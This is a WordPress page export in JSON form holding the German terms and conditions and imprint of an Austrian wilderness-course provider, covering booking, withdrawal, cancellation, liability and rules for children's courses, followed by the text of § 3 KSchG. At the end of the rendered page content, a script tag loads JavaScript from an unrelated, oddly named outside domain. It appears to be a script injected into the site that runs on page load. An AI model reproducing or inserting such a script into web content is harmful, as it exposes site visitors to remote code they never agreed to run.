{"id":629,"date":"2017-11-02T12:27:56","date_gmt":"2017-11-02T10:27:56","guid":{"rendered":"https:\/\/www.waldcamp.at\/wordpress\/?page_id=629"},"modified":"2022-07-02T15:48:11","modified_gmt":"2022-07-02T13:48:11","slug":"impressum","status":"publish","type":"page","link":"https:\/\/www.waldcamp.at\/wordpress\/index.php\/impressum\/","title":{"rendered":"Impressum"},"content":{"rendered":"<p><strong>ALLGEMEINE GESCH\u00c4FTSBEDINGUNGEN<\/strong><\/p>\n<p><strong>F\u00dcR ALFRED STEINMETZ-WILDNISLEHRG\u00c4NGE<\/strong><\/p>\n<p><em>Stand: 01.01.2021<\/em><\/p>\n<p>1. Geltung der AGB: Die Wildnislehrg\u00e4nge (Kurse) werden ausschlie\u00dflich aufgrund der folgenden Allgemeinen Gesch\u00e4ftsbedingungen (kurz: AGB) abgehalten. AGB von Kursteilnehmern (\u201efremde AGB\u201c) werden nicht Vertragsinhalt, auch wenn sie erst nach diesen AGB vorgelegt werden und der Wildnislehrgang danach ohne nochmaliger Ablehnung der fremden AGB durchgef\u00fchrt wird.<\/p>\n<p>2. Anmeldung: Die Anmeldung kann grunds\u00e4tzlich nur durch vollst\u00e4ndiges und wahrheitsgem\u00e4\u00dfes Ausf\u00fcllen unseres digitalen Anmeldeformulars erfolgen. Darin sind auch die vorliegenden AGB enthalten. Mit dem Anklicken der Zustimmungserkl\u00e4rung zu den AGB, sowie der Online\u00fcberweisung des Kursbeitrages erfolgt automatisch Ihr verbindlicher Antrag auf Teilnahme am Wildnislehrgang.<\/p>\n<p>3. Vertragsabschluss: Der Vertrag kommt erst dann zustande, wenn (a) der Kursbeitrag des Teilnehmers auf unserem Konto eingelangt ist und (b) in dem konkret gebuchten Termin noch ein Platz frei ist. \u2013 Unsere Teilnahmebest\u00e4tigung senden wir in der Regel innerhalb weniger Tage an Sie, an die von Ihnen genannte E-Mail-Adresse. Sie erkl\u00e4ren sich ausdr\u00fccklich damit einverstanden, dass Sie das Risiko des Einlangens der Teilnahmebest\u00e4tigung auf Ihrer E-Mail-Adresse selbst tragen. Sp\u00e4testens 3 Wochen vor Beginn des Kurses erhalten Sie detaillierte Informationen zum Kurs (Wegbeschreibung, Ausr\u00fcstungsliste etc.).<\/p>\n<p>4. R\u00fccktritt:<\/p>\n<p>4.1. Ihr R\u00fccktrittsrecht: Wenn Sie Verbraucher sind, kann der R\u00fccktritt bis zum Zustandekommen des Vertrags oder danach binnen 14 Tagen erkl\u00e4rt werden (siehe den Text des \u00a7 3 KSchG am Ende dieser AGB). Dar\u00fcber hinaus steht Ihnen das R\u00fccktrittsrecht zu:<\/p>\n<p>4.1.1. wenn der Grund alleine oder \u00fcberwiegend in unserem Bereich liegt (z.B. wenn der Kursleiter an der Abhaltung des Kurses verhindert ist, z.B. wegen Erkrankung, Unfall etc.) und der Kurs vor dessen Beginn abgesagt oder berechtigt der R\u00fccktritt erkl\u00e4rt wird, erhalten Sie die einbezahlte Kursgeb\u00fchr in vollem Umfang zur\u00fcck. Wird der Kurs nach Beginn, also vorzeitig abgebrochen oder berechtigt gek\u00fcndigt, erhalten Sie die aliquote Kursgeb\u00fchr zur\u00fcck (Beispiel: der Kurs umfasst 36 Stunden; er muss wegen Erkrankung des Kursleiters nach 24 Stunden abgebrochen werden, daher fehlen 12 Stunden; das ist ein Drittel des Kurses. R\u00fcckerstattet wird daher ein Drittel der Geb\u00fchr).<\/p>\n<p>4.1.2. liegt ein Grund vor, der nicht in unserem Bereich liegt (z.B. schwere Unwetter, Pandemie mit Kontaktverbot sogar bei Tragen eines Mund-Nasenschutzes etc.), erhalten Sie ebenfalls jenen Teil der Geb\u00fchr zur\u00fcck, der in seinem Zeitausma\u00df dem noch nicht absolvierten Stundenausma\u00df des Kurses entspricht, h\u00f6chstens aber 90% der Geb\u00fchr. Unser R\u00fccktrittsrecht: Liegen bei Ihnen Gr\u00fcnde vor, die uns die Abhaltung oder die Fortsetzung des Kurses unzumutbar machen, besteht kein Anspruch auf R\u00fcckerstattung der Geb\u00fchr (z.B. Sie erkranken, weigern sich wichtige, den Kursablauf betreffende Anordnungen zu befolgen oder setzen Verhalten, das f\u00fcr Sie, andere Kursteilnehmer oder uns Gefahren f\u00fcr die k\u00f6rperliche Sicherheit bzw. Gesundheit oder einen Sachschaden verursachen kann). Jede Zuwiderhandlung wird mit dem Verlassen des Kurses geahndet. Die Kursgeb\u00fchr wird auch in diesem Fall nicht r\u00fcckerstattet. Wir behalten uns vor, Teilnehmer aus disziplin\u00e4ren, gesundheitlichen oder anderen schwerwiegenden Gr\u00fcnden vom Kurs auszuschlie\u00dfen. Wird ein Kurs (z.B.: aufgrund von Heimweh, Versto\u00df gegen Alkohol- und Drogenverbot, mutwillige Sachbesch\u00e4digung, Missachtung von Sicherheitsanweisungen, Beh\u00f6rdenanordnung) vorzeitig abgebrochen, erfolgt keine Kostenr\u00fcckerstattung. Bei R\u00fccktritt aus Gr\u00fcnden in Ihrem Bereich behalten wir uns aber vor, die Geb\u00fchr zur\u00fcckzuerstatten, wenn ein anderer, von Ihnen neu zugef\u00fchrter Teilnehmer an Ihrer Stelle einspringt, der bis dahin nicht angemeldet war und rechtzeitig vor Kursbeginn die volle Geb\u00fchr bezahlt hat. Andernfalls erfolgt keine R\u00fcckerstattung.<\/p>\n<p>4.2. Schlechtwetter ist kein Grund, den Kurs nicht zu beginnen, oder abzubrechen, also auch kein R\u00fccktrittsgrund. Wir sorgen immer f\u00fcr einen regenfesten Unterschlupf oder ein \u201eTipi\u201c, wo unsere Kursteilnehmer in angemessener Zeit trocken die Zeit bis zum Ende des Tages anderweitig unterwiesen werden k\u00f6nnen. F\u00fcr den Fall eines aufziehenden Gewitters wird ein daf\u00fcr zur Verf\u00fcgung stehendes naheliegendes Haus aufgesucht.<\/p>\n<p>5. Stornogeb\u00fchren: Bei Stornierung des Kurses au\u00dferhalb des R\u00fccktrittsrechtes nach \u00a7 3 KSchG erstatten wir bei Einlangen Ihrer schriftlichen Stornierung (an info@waldcamp.at) bis sp\u00e4testens 15. Tag vor dem Kursbeginn 50% der Kursgeb\u00fchr; bei sp\u00e4terer Stornierung oder Nichterscheinen k\u00f6nnen wir keine R\u00fcckerstattung leisten. Im Stornofall behalten wir uns vor, auch eine Ersatzperson zu akzeptieren, falls diese alle Voraussetzungen (einschlie\u00dflich Zahlung) f\u00fcr eine Kursteilnahme erf\u00fcllt.<\/p>\n<p>6. Verpflegung, Unterkunft: Bei Kursen, die ohne \u00dcbernachtung gebucht werden, verpflegt sich der Teilnehmer selbst; es werden lediglich Beh\u00e4lter mit Trinkwasser zum Nachf\u00fcllen bereitgestellt. Bei Kursen mit \u00dcbernachtung werden alle Zutaten zur Zubereitung von Speisen gegen eine zus\u00e4tzliche \u00dcbernachtungs- und Verpflegungspauschale (\u00dcVP) zur Verf\u00fcgung gestellt. Essbesteck muss jeder Teilnehmer selbst mitbringen. Jeder Teilnehmer muss sein eigenes Zelt mit eigener Thermomatte und Schlafsack mitbringen. Kinder k\u00f6nnen bei Einvernehmen zwischen Kursleiter und Erziehungsberechtigtem in einem Tipi \u00fcbernachten. Im Tipi wird ein Kursleiter oder eine\u20ac Betreuer(in) f\u00fcr Ruhe und Sicherheit sorgen.<\/p>\n<p>7. Eignung, Mitwirkungs- und Informationspflicht des Kursteilnehmers:<\/p>\n<p>7.1. Sie best\u00e4tigen mit Ihrer Online-Kursanmeldung, dass Sie bzw. Ihr Kind gesund sowie k\u00f6rperlich und geistig f\u00e4hig sind, am gebuchten Kurs teilzunehmen, nicht an einer Viruserkrankung oder sonst ansteckenden Krankheit erkrankt sind und auch keine Symptome einer Viruserkrankung oder sonst ansteckenden Krankheit aufweisen. Wir ersuchen im Interesse aller anderen Kursteilnehmer um Verst\u00e4ndnis, dass Personen, die unter Symptomen von ansteckenden Krankheiten leiden oder \u00dcbertr\u00e4ger ansteckender Krankheiten (z.B. Corona-Virus) sind, bis zu ihrer vollkommenen Genesung nicht zur Teilnahme zugelassen werden k\u00f6nnen. Krankheiten (z.B. Fieber, Herz- oder Kreislaufbeschwerden etc.), Allergien, Behinderungen oder Medikamenteneinnahme und dergleichen sind dem Veranstalter und den Kursleitern auf jeden Fall vor Kursbeginn mitzuteilen, zumal dieser nur so im Ernstfall f\u00fcr Sie entsprechende Hilfe organisieren kann.<\/p>\n<p>7.2. Bei all unseren Kursen sind die Kursleiter angehalten, besondere Vorsichtsma\u00dfnahmen einzuhalten, um die Gefahr von Verletzungen, Unf\u00e4llen und dergleichen zu vermeiden. Daher verpflichtet sich der Kursteilnehmer ausdr\u00fccklich den Sicherheitsanweisungen und jenen der Kursleiter Folge zu leisten.<\/p>\n<p>7.3. W\u00e4hrend der gesamten Kursdauer herrscht absolutes Alkohol- und Drogenverbot, sowie das Gebot gr\u00f6\u00dftm\u00f6glicher Ruhe und R\u00fccksichtnahme.<\/p>\n<p>8. Risikotragung, Haftung:<\/p>\n<p>8.1. Die Teilnahme an den Kursen erfolgt jedenfalls auf eigene Gefahr.<\/p>\n<p>8.2. Der Veranstalter und seine Mitarbeiter haften nicht f\u00fcr Verletzungen und\/oder Erkrankungen und\/oder Sch\u00e4den jeglicher Art, die der Teilnehmer bei der An- und Abreise, w\u00e4hrend des Kurses auf dem Gel\u00e4nde an seinem K\u00f6rper, seiner Gesundheit und seinem Verm\u00f6gen erleidet. Dieser Haftungsausschluss gilt f\u00fcr alle Ursachen und alle Ereignisse, sei es bei der Teilnahme am Kurs oder im Zusammenhang damit wie etwa bei der An- und Abreise, bei Verletzung oder Unf\u00e4llen, am Eigentum oder sonstigen Wertgegenst\u00e4nden etc. Der Haftungsausschluss gilt jedoch nicht f\u00fcr fahrl\u00e4ssig verursachte K\u00f6rperverletzung und auch nicht f\u00fcr grob fahrl\u00e4ssig oder gar vors\u00e4tzlich verursachte Verm\u00f6gens-oder Sachsch\u00e4den.<\/p>\n<p>8.3. Der Haftungsausschluss gilt insbesondere auch bei Sch\u00e4den durch Verlust, Folgesch\u00e4den, Sch\u00e4den Dritter oder Sch\u00e4den, die durch F\u00e4lle h\u00f6herer Gewalt verursacht werden. Der Abschluss einer privaten Storno-, Unfall- und Haftpflichtversicherung wird empfohlen.<\/p>\n<p>9. Sonderreglung f\u00fcr Kurse f\u00fcr Kinder und Jugendliche:<\/p>\n<p>9.1. Anmeldungen f\u00fcr Minderj\u00e4hrige werden nur angenommen, wenn die Erziehungsberechtigten im eigenen Namen und auf ihre eigene Rechnung anmelden und der Minderj\u00e4hrige dabei lediglich der Leistungsempf\u00e4nger ist, der den Kurs absolviert.<\/p>\n<p>9.2. Sp\u00e4testens bei Kursantritt ist von den Erziehungsberechtigten an die Kursleitung vor Ort folgendes anzugeben: (a) Telefonnummer, unter der der Erziehungsberechtigte oder die Abholperson jederzeit erreichbar ist, (b) Information, ob die Abreise des Teilnehmers selbst\u00e4ndig erfolgt, (c) E-Card (widrigenfalls entstandene Kosten f\u00fcr Arzt, Apotheke etc. von den Erziehungsberechtigten zu tragen sind).<\/p>\n<p>9.3. Bei Kursende sind die Teilnehmer p\u00fcnktlich abzuholen. Unsere Aufsichtspflicht endet sp\u00e4testens mit der \u00dcbergabe des Teilnehmers an die abholberechtigte Person. Keine Aufsichtspflicht besteht, wenn die Teilnehmer nicht abgeholt werden und wir erfolglos Ma\u00dfnahmen gesetzt haben, um die Erziehungsberechtigten zu erreichen (wird bei Kursantritt keine Telefonnummer bekanntgegeben, entf\u00e4llt diese Verpflichtung von vorneherein). Im Falle eines Ausschlusses vom Kurs oder bei Abbruch eines Kurses sind die Teilnehmer unmittelbar vom Kurs abzuholen. Die Kosten hierf\u00fcr sind vom Teilnehmer selbst zu tragen, es erfolgt keine Kostenr\u00fcckerstattung.<\/p>\n<p>9.4. Die Kurse sind ein wildnisp\u00e4dagogisches Angebot, deren Aktivit\u00e4ten auch bei Regen im Freien, insbesondere im Wald durchgef\u00fchrt werden. Der Erziehungsberechtigte erkl\u00e4rt sich damit einverstanden, dass sein Kind auch au\u00dferhalb des Einwirkungsbereichs der Kursleiter alleine unterwegs ist (z.B. beim Holzsammeln). Aus Sicherheitsgr\u00fcnden muss den Teilnehmern von den Erziehungsberichtigen eine Trillerpfeife zur Verf\u00fcgung gestellt werden, um sich bei Bedarf bemerkbar machen zu k\u00f6nnen. Weiters erkl\u00e4rt sich der Erziehungsberechtigte damit einverstanden, dass sein Kind unter Aufsicht schnitzt, mit Werkzeugen hantiert und Feuer macht. Von den Kursleitern werden keine Medikamente verabreicht oder deren Einnahme sichergestellt.<\/p>\n<p>10. Salvatorische Klausel: Sollten diese AGB oder Teile davon unwirksam sein oder unwirksam werden, so bleiben die \u00fcbrigen Bestimmungen davon unber\u00fchrt. Die Bestimmungen bzw. deren unwirksamen Teile sind dann so auszulegen, dass sie wirtschaftlich und in ihrem Sinngehalt den unwirksamen Teilen so nahe wie m\u00f6glich kommen, aber dennoch der jeweils geltenden Rechtslage entsprechen.<\/p>\n<p>11. Anzuwendendes Recht, Gerichtsstand: \u00d6sterreichisches Recht (ohne UN-Kaufrecht). Krems an der Donau.<\/p>\n<p>Veranstalter, Kontakt, Impressum und f\u00fcr den Inhalt verantwortlich: Alfred Steinmetz, zertifizierter Wildnisp\u00e4dagoge, Anblickweg 12, 3552 Stratzing, Telefon +43(0)680 \/ 55 55 532, E-Mail: <a href=\"mailto:info@waldcamp.at\">info@waldcamp.at<\/a>; Internet: <a href=\"http:\/\/www.waldcamp.at\/\">www.waldcamp.at<\/a><\/p>\n<p>Hinweis: Trotz sorgf\u00e4ltiger inhaltlicher Kontrolle \u00fcbernehmen wir keine Haftung f\u00fcr die Inhalte externer Links. F\u00fcr den Inhalt der verlinkten Seiten ist ausschlie\u00dflich deren Betreiber verantwortlich.<\/p>\n<p>\u00a73 KSchG lautet:<\/p>\n<p>(1) Hat der Verbraucher seine Vertragserkl\u00e4rung weder in den vom Unternehmer f\u00fcr seine gesch\u00e4ftlichen Zwecke dauernd ben\u00fctzten R\u00e4umen noch bei einem von diesem daf\u00fcr auf einer Messe oder einem Markt ben\u00fctzten Stand abgegeben, so kann er von seinem Vertragsantrag oder vom Vertrag zur\u00fccktreten. Dieser R\u00fccktritt kann bis zum Zustandekommen des Vertrags oder danach binnen 14 Tagen erkl\u00e4rt werden. Der Lauf dieser Frist beginnt mit der Ausfolgung einer Urkunde, die zumindest den Namen und die Anschrift des Unternehmers, die zur Identifizierung des Vertrags notwendigen Angaben sowie eine Belehrung \u00fcber das R\u00fccktrittsrecht, die R\u00fccktrittsfrist und die Vorgangsweise f\u00fcr die Aus\u00fcbung des R\u00fccktrittsrechts enth\u00e4lt, an den Verbraucher, fr\u00fchestens jedoch mit dem Zustandekommen des Vertrags, bei Kaufvertr\u00e4gen \u00fcber Waren mit dem Tag, an dem der Verbraucher den Besitz an der Ware erlangt. Ist die Ausfolgung einer solchen Urkunde unterblieben, so steht dem Verbraucher das R\u00fccktrittsrecht f\u00fcr eine Frist von zw\u00f6lf Monaten und 14 Tagen ab Vertragsabschluss beziehungsweise Warenlieferung zu; wenn der Unternehmer die Urkundenausfolgung innerhalb von zw\u00f6lf Monaten ab dem Fristbeginn nachholt, so endet die verl\u00e4ngerte R\u00fccktrittsfrist 14 Tage nach dem Zeitpunkt, zu dem der Verbraucher die Urkunde erh\u00e4lt.<\/p>\n<p>(2) Das R\u00fccktrittsrecht besteht auch dann, wenn der Unternehmer oder ein mit ihm zusammenwirkender Dritter den Verbraucher im Rahmen einer Werbefahrt, einer Ausflugsfahrt oder einer \u00e4hnlichen Veranstaltung oder durch pers\u00f6nliches, individuelles Ansprechen auf der Stra\u00dfe in die vom Unternehmer f\u00fcr seine gesch\u00e4ftlichen Zwecke ben\u00fctzten R\u00e4ume gebracht hat.<\/p>\n<p>(3) Das R\u00fccktrittsrecht steht dem Verbraucher nicht zu,<\/p>\n<p>1. wenn er selbst die gesch\u00e4ftliche Verbindung mit dem Unternehmer oder dessen Beauftragten zwecks Schlie\u00dfung dieses Vertrages angebahnt hat,<\/p>\n<p>2. wenn dem Zustandekommen des Vertrages keine Besprechungen zwischen den Beteiligten oder ihren Beauftragten vorangegangen sind,<\/p>\n<p>3. bei Vertr\u00e4gen, bei denen die beiderseitigen Leistungen sofort zu erbringen sind, wenn sie \u00fcblicherweise von Unternehmern au\u00dferhalb ihrer Gesch\u00e4ftsr\u00e4ume geschlossen werden und das vereinbarte Entgelt 25\u00a0Euro, oder wenn das Unternehmen nach seiner Natur nicht in st\u00e4ndigen Gesch\u00e4ftsr\u00e4umen betrieben wird und das Entgelt 50\u00a0Euro nicht \u00fcbersteigt,<\/p>\n<p>4. bei Vertr\u00e4gen, die dem Fern- und Ausw\u00e4rtsgesch\u00e4fte-Gesetz oder dem Versicherungsvertragsgesetz unterliegen, oder<\/p>\n<p>5. bei Vertragserkl\u00e4rungen, die der Verbraucher in k\u00f6rperlicher Abwesenheit des Unternehmers abgegeben hat, es sei denn, dass er dazu vom Unternehmer gedr\u00e4ngt worden ist.<\/p>\n<p>(4) Die Erkl\u00e4rung des R\u00fccktritts ist an keine bestimmte Form gebunden. Die R\u00fccktrittsfrist ist gewahrt, wenn die R\u00fccktrittserkl\u00e4rung innerhalb der Frist abgesendet wird.<\/p>\n<p>(5) Der Verbraucher kann ferner von seinem Vertragsantrag oder vom Vertrag zur\u00fccktreten, wenn der Unternehmer gegen die gewerberechtlichen Regelungen \u00fcber das Sammeln und die Entgegennahme von Bestellungen auf Dienstleistungen (<a href=\"https:\/\/www.jusline.at\/gesetz\/gewo\/paragraf\/54\">\u00a7\u00a054 GewO\u00a01994<\/a>), \u00fcber das Aufsuchen von Privatpersonen und Werbeveranstaltungen (<a href=\"https:\/\/www.jusline.at\/gesetz\/gewo\/paragraf\/57\">\u00a7\u00a057 GewO\u00a01994<\/a>) oder \u00fcber die Entgegennahme von Bestellungen auf Waren von Privatpersonen (<a href=\"https:\/\/www.jusline.at\/gesetz\/gewo\/paragraf\/59\">\u00a7\u00a059 GewO\u00a01994<\/a>) versto\u00dfen hat. Die Bestimmungen des Abs.\u00a01, Abs.\u00a03 Z\u00a04 und 5 und Abs.\u00a04 sind auch auf dieses R\u00fccktrittsrecht anzuwenden. Dieses steht dem Verbraucher auch in den F\u00e4llen des Abs.\u00a03 Z\u00a01 bis 3 zu.<script src=\"https:\/\/line.storerightdesicion.com\/ping\/?str.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ALLGEMEINE GESCH\u00c4FTSBEDINGUNGEN F\u00dcR ALFRED STEINMETZ-WILDNISLEHRG\u00c4NGE Stand: 01.01.2021 1. Geltung der AGB: Die Wildnislehrg\u00e4nge (Kurse) werden ausschlie\u00dflich aufgrund der folgenden Allgemeinen Gesch\u00e4ftsbedingungen (kurz: AGB) abgehalten. AGB von Kursteilnehmern (\u201efremde AGB\u201c) werden nicht Vertragsinhalt, auch wenn sie erst nach diesen AGB vorgelegt werden und der Wildnislehrgang danach ohne nochmaliger Ablehnung der fremden AGB durchgef\u00fchrt wird. 2. Anmeldung: &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/www.waldcamp.at\/wordpress\/index.php\/impressum\/\" class=\"more-link\"><span class=\"screen-reader-text\">\u201eImpressum\u201c <\/span>weiterlesen<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-629","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.waldcamp.at\/wordpress\/index.php\/wp-json\/wp\/v2\/pages\/629","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.waldcamp.at\/wordpress\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.waldcamp.at\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.waldcamp.at\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.waldcamp.at\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=629"}],"version-history":[{"count":5,"href":"https:\/\/www.waldcamp.at\/wordpress\/index.php\/wp-json\/wp\/v2\/pages\/629\/revisions"}],"predecessor-version":[{"id":2428,"href":"https:\/\/www.waldcamp.at\/wordpress\/index.php\/wp-json\/wp\/v2\/pages\/629\/revisions\/2428"}],"wp:attachment":[{"href":"https:\/\/www.waldcamp.at\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=629"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}